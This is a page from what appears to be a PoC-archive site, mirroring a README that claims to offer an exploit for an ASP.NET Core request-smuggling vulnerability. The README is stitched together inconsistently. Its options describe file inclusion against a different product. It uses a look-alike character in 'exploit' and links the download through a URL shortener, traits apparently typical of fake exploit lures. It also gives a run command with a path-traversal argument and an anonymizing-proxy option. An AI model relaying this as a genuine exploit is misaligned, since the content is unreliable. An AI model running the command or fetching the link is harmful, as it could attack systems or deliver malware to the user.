Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1325 CNY

100%
Buy Us a Coffee

CVE-2025-55315 PoC — ASP.NET Security Feature Bypass Vulnerability

Source
https://github.com/RootAid/CVE-2025-55315
Associated Vulnerability
Title:ASP.NET Security Feature Bypass Vulnerability (CVE-2025-55315)
Description:Inconsistent interpretation of http requests ('http request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.
Readme
# CVE-2025-55315

### Overview
A critical vulnerability in ASP.NET Core involving inconsistent interpretation of HTTP requests, enabling HTTP request/response smuggling. The flaw affects ASP.NET Core versions 2.3, 8.0, 9.0, allowing an authorized attacker to bypass security features over a network.

### Versions
Asp.net Core 8.0
Asp.net Core 9.0
Asp.net Core 2.3
Microsoft Visual Studio 2022 Version 17.12

### Published Date
14 October 2025

### Key Points

- **Severity**: Critical
- **CVSS Score**: 9.9 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low
- **Privileges Required**: Low

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the explоit: `python explоit.py --target <target_url> --file "/path/to/Web.config"`


### How It Works
An attacker with low-privilege network access can: - Bypass front-end security controls - View sensitive data including user credentials - Modify server files - Potentially hijack user sessions - Breach security boundaries between system components The vulnerability has a high severity with significant impacts on confidentiality, integrity, and potential unauthorized access.

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-55315 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.

### PoC explоit download [here](https://tinyurl.com/3rht2j66)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →